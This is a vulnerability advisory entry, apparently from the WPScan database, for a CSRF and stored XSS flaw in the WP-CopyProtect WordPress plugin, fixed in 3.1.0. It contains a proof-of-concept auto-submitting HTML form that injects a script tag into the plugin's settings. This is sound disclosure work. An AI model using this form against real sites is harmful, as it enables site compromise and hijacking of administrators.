WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The WP-CopyProtect [Protect your blog posts] plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery (CSRF) token (nonce).
Proof of Concept
<form id="form" method="POST" action="http://localhost/wp-admin/admin.php?page=wpcopyprotect">
        <input type="hidden" name="CopyProtect_nrc" value="2"/>
        <input type="hidden" name="CopyProtect_nrc_text" value='"><script>alert(1)</script>'/>
        <input type="hidden" name="CopyProtect_user_settings" value="2"/>
        <input type="hidden" name="CopyProtect_save" value="Save Settings"/>
</form>
<script>
        document.getElementById("form").submit();
</script>

Affects

Plugin wp-copyprotect
fixed in version 3.1.0

References

URL https://research.g0blin.co.uk/g0blin-00054/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 97
Verified No
WPVDB ID 8066

Timeline

Publicly Published 2015-06-30 (over 1 year ago)
Added 2015-06-30 (over 1 year ago)
Last Updated 2015-06-30 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.